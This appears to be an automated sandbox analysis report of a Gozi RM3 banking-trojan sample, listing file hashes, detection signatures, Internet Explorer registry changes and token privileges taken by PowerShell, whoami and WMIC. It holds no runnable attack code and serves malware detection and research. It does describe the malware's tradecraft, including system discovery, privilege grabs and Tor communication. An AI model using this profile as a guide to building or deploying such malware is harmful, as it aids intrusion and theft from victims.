| SHA1 | abeddf2e3e6b4e503281e152270c872ba2ad90af |
| SHA256 | 156eddafe79d7cbe2555ad9abc518d3c7de71c1269d98e7f6074065f6ada29b2 |
| SHA512 | 126d8381c847ac1acf0152787043068159b3870cbb9482e7c57ee1a4581992d34a2c915693ddb48a4ece045ef5e179f7451207a6133a2958e733404bde867564 |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 893f8524287e635bc325c12517b1eca9 |
| SHA1 | 0ea8c7cd0334091cd9ad3eba4a0208b1871e7a94 |
| SHA256 | 6e986b0a83e4294d728f4b6eaded48ec78237e4f19f8972c5d22785848bce55a |
| SHA512 | 2587f586d0b07149a88bd4d57f842cf98dc3f90b9ccfd9169a6688b8e09fa8a0ce79e62a9ac8c306f0f72d512ba64cabddbb1a0e08cd05aa7ab3e7195a7682dc |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 893f8524287e635bc325c12517b1eca9 |
| SHA1 | 0ea8c7cd0334091cd9ad3eba4a0208b1871e7a94 |
| SHA256 | 6e986b0a83e4294d728f4b6eaded48ec78237e4f19f8972c5d22785848bce55a |
| SHA512 | 2587f586d0b07149a88bd4d57f842cf98dc3f90b9ccfd9169a6688b8e09fa8a0ce79e62a9ac8c306f0f72d512ba64cabddbb1a0e08cd05aa7ab3e7195a7682dc |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 01f148eb1c87e87e79f1cb57591e1f9e |
| SHA1 | e1536cbec4ab23ba0b508a2799ccb9925088b8ab |
| SHA256 | e5651ca0d94420d20bbb44b05dede5ba285120b2881709905f299b37ce7f4071 |
| SHA512 | ab3b70de666cd1c5aa6ce57c98f5b932231d6bb944a9d29146a02de1679e5de8211381bb2631b4fdc6ecf2e597c74798339d58fd37a5183547de86c0af8f5e5f |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 01f148eb1c87e87e79f1cb57591e1f9e |
| SHA1 | e1536cbec4ab23ba0b508a2799ccb9925088b8ab |
| SHA256 | e5651ca0d94420d20bbb44b05dede5ba285120b2881709905f299b37ce7f4071 |
| SHA512 | ab3b70de666cd1c5aa6ce57c98f5b932231d6bb944a9d29146a02de1679e5de8211381bb2631b4fdc6ecf2e597c74798339d58fd37a5183547de86c0af8f5e5f |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 1b0c5c633d5f11e84a546f436da6edfb |
| SHA1 | 6f68c61a04083147f97e0d09b2ae3ca3206afe8d |
| SHA256 | 79af1dc1f50bc3887ac3286dde24d932193ff8e58d5a3792e6e1a0fdfa9dba12 |
| SHA512 | 517a4342c152c3800cf14b324758fb2404a1ff813591c6336c8ef5ef7dfbc0d93457c599fa0a2ed2021dcb6610eb7269bf256a5fc2a940ffff6fbaa9d3e9592d |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 1b0c5c633d5f11e84a546f436da6edfb |
| SHA1 | 6f68c61a04083147f97e0d09b2ae3ca3206afe8d |
| SHA256 | 79af1dc1f50bc3887ac3286dde24d932193ff8e58d5a3792e6e1a0fdfa9dba12 |
| SHA512 | 517a4342c152c3800cf14b324758fb2404a1ff813591c6336c8ef5ef7dfbc0d93457c599fa0a2ed2021dcb6610eb7269bf256a5fc2a940ffff6fbaa9d3e9592d |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 348ea633774cdb59e525c1744df6608b |
| SHA1 | f7ef5a03f1b6d20b3e0357a4ee3e7cbe1f78e72d |
| SHA256 | 8c7527f5296a7ff85c5d5c1da86dbf3b8802a0f1f640a220029bcad64b1487de |
| SHA512 | f644dded3a336ba07248949f42f253993b4f33324d18a7742c027e02544026dca0f0c61c2a90aebddc4ee95662b6a600b1eecef769828f8cca7df1791e75598a |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 348ea633774cdb59e525c1744df6608b |
| SHA1 | f7ef5a03f1b6d20b3e0357a4ee3e7cbe1f78e72d |
| SHA256 | 8c7527f5296a7ff85c5d5c1da86dbf3b8802a0f1f640a220029bcad64b1487de |
| SHA512 | f644dded3a336ba07248949f42f253993b4f33324d18a7742c027e02544026dca0f0c61c2a90aebddc4ee95662b6a600b1eecef769828f8cca7df1791e75598a |
C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
| MD5 | 69101071e1de615d8449b4a118d51e2e |
| SHA1 | 9a04639583310c6f0dbb15dcdcb81a480e54dd22 |
| SHA256 | c464da6490735ef3e20d33d4a4624af00bb3e3a942d6a588fcc618c5ec6e138e |
| SHA512 | 8a99c0d080af7cfdc2914840e6b36cf5dd706dcf0254c65347b3c5b10aefd2296529fdf3b5bf8ff00fab9331a06ce4a296e6bcf342fbe3ed1464d59b26665dd0 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-15 08:05
Reported
2022-03-15 08:35
Platform
win10v2004-en-20220113
Max time kernel
1696s
Max time network
1776s
Command Line
Signatures
Gozi RM3
Grants admin privileges
Uses Tor communications
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Restr.exe |
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2317671783" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1064f97d4338d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000af0b005e4d17189b80f17a7a9b9fae8dde5b3ee941963c35b330c332e6c35938000000000e800000000200002000000032baa51108dee1171cafe41bc03a45193341b239dbbd1408288a071e2f31768cc00000008ca69103c90cbb9d70b1dc7a31329374def34971f2aee6fbf1665acd6aaf5680586a96c25d07de46f72c857cd5be0137b5b4c77015a65ead41299de3b7b25e906d0554705b4ca6e6ad0056c11cbd420825ea7b34e4316dcacb0a6f31764665ac9b9640f2d0da0c5d3828eeb7fb42f1f88e7d024a56954cf1bbc8f3266f7f0e2b352dd10f2f04ee5e9ae47bb8baa33fbba0f98fc0c9bfe063f614272d2285f8a4eeed9b63edf4ea9e8e3f48a2df5965aeac7cbdd08b7725051a082d5fccb20603400000005832b57c34f5d8a5a89e69e152e47853950844bd6fed7a58a134c958bf9abafdbf9c8638699242eddfcd4935002207c77e54ae8c0073a45a376167519021c399 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000694908dbfb46b57cd6968555a943005e9119959593d00753b9321fd109749f6f000000000e8000000002000020000000bb00d8a1068d77372474e6e05666d87be8542d8d50dcfa6309fd3e30a23dcc6120000000bdd9b023ff3c8e96d682cc50e317e1622624ec1843c96d1648c5d9f55206baf84000000092099aac9dd1ede2d30e05180d80f415c8a1be5f00a5222873d56860a8a83c00fbf63ab02ece3f848ccc883fa7e0f00e778ae2c5406c37d5c1f8592155cdcf78 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947395" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff720000001a000000f80400007f020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B5C4DBF1-A436-11EC-B9A4-4AFEF23D9694} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a000000000200000000001066000000010000200000008b909b8338d4738f4b3b2e4dcbe9cf0e2b037d12806396cf22528efc111641bb000000000e8000000002000020000000366574914b9a1bd144898af76963d69ad400b90ba988cc139251325775b3fe2d200000001129b6fe636ba60b01daa27e12b9ab8fdc1487eff7892c55d8b815f2cb97ee5440000000f7cdcb0ff5fdc78d44c377472c443e9f35b6f7984431996e83c3ea46c09db82d47785179d8f732a0b5ffafb83318a2edcf3f22a3964433b7815b60c96d4348bb | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947395" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f323031e69ff0a4483a9b6c67c2edc8a00000000020000000000106600000001000020000000dab01f0f7faab4215f0fcb8b440aa7fe3462ab84531a7e991078e12322072e96000000000e800000000200002000000066f74c5f8304307b95bcb2799d4aa71384ea31b06948dda581989f0f3f73620fc0000000212ed449ae5d1b9a6ec1de03d13106297abfea4735369036b56e487aa036316c1256bc6d0b418a08b0e4c60b09c498a9d59160251f7a8e455bfde4c620e2fe70b2f144789ea683cfa5ed534706285fb43bec4e243c3e7dcfb1f6e3e1b54293543b34ff6a82ca84e9e4f66d4ccd7b72dfa50275a4d176e4c39382dca21eece1f0731a213e19312d6182ecf8c85ea6e26075cb1267dbb6ae952633120216c79f3fff6a627f5f9cb1ed801920a346f87adf7cd20f1f54f5254d9930b71c902d4086400000007ed9abcba78840c86d9f40c12c1be9a627f825e5fbbd6fb78fea9301c6e0bd1928dffe8f87d3565e508b3acf3294883c92f00226b0cfce0b58fda69926825808 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2317671783" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80997d7c4338d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Restr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege per winnt.h; the sandbox reports these four by number only) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 (LUID 34 = SeTimeZonePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 (LUID 35 = SeCreateSymbolicLinkPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 (LUID 36 = SeDelegateSessionUserImpersonatePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
